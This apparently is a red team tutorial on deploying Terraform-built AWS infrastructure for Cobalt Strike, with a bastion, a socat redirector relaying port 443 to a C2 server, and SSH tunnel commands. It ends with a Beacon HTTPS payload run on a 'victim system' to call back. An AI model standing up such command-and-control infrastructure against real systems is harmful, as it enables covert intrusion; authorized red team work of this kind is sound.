This guide documents using Terraform to build red team infrastructure, following the companion blog post on manual red team infrastructure setup. The repository lives at github.com/rbfp/redteam-infra.
Pre-Requisites
- An AWS account with access keys
- Terraform installed
- AWS CLI installed
Create an additional IAM user (terraform-redteam) with Power User permissions, disable its console login, and create access keys. Install Terraform and the AWS CLI on a Kali/Linux box:
$ sudo apt update
$ sudo apt install terraform
$ sudo apt install awscli Step 0 โ Download the GitHub Repo
Set up an SSH key with GitHub (docs), then clone:
$ git clone git@github.com:rbfp/redteam-infra.git
$ cd redteam-infra Step 1 โ Configure AWS CLI
Use a dedicated profile to keep credentials separate. Default region: us-west-2.
$ aws configure --profile redteam Step 2 โ Configure Region to Deploy
Run ./infra_setup.sh. It prompts for AWS profile, project name (e.g. redwest20), region, OS choice (Ubuntu recommended), and availability zones.
Step 3 โ Terraform the Cloud
The automated Terraform commands execute, creating ~30 resources with auto-generated credentials:
- Bastion Host โ user
bastion, key{{ project_name }}-bastion.pem - Redirector โ user
redirector, key{{ project_name }}-internal.pem - C2 Server โ user
c2server, key{{ project_name }}-internal.pem
Step 4 โ Verify Deployment
Use ./manage_aws.sh to start, stop, list instances, and check billing. Verify in the AWS Console that instances have no public IPv4 addresses, then test SSH through the bastion:
$ ssh -i ~/redteam_infra/build/{{ project_name }}-bastion.pem bastion@{{ bastion_ipv6 }}
$ ssh -i .ssh/internal.pem c2server@{{ c2_ipv4 }} Step 5 โ Cobalt Strike Install
Run ./cobalt_setup.sh to automate dependency install and file deployment. It prompts for the redirector IPv6, C2 server IPv4, redirector IPv4, project name, and the Cobalt Strike 7z password.
Step 7 โ Cobalt Server Setup
Multiple concurrent terminal sessions are required.
On the C2 server:
$ chmod +x ./CS491/Server/teamserver ./CS491/Server/TeamServerImage
$ ./teamserver {{ c2_ipv4 }} {{ cobalt_server_pass }} Attack box SSH tunnel:
$ ssh -i {{ project_name }}-bastion.pem -L 50050:{{ c2_ipv4 }}:50050 bastion@{{ bastion-ipv6 }} Redirector traffic redirection:
$ sudo socat TCP6-LISTEN:443,reuseaddr,fork TCP4:{{ c2_ipv4 }}:443 Cobalt Strike client:
$ chmod +x ./cobaltstrike-client.sh
$ ./cobaltstrike-client.sh Connect with host 127.0.0.1, port 50050.
Step 8 โ Proof of Concept
Listener: name HTTPS, payload Beacon HTTPS, HTTPS hosts set to the redirector IPv6 (square-bracket encapsulated).
Payload: listener HTTPS, system call Indirect, HTTP library winhttp. Execute the resulting .exe on the victim system to establish the beacon callback.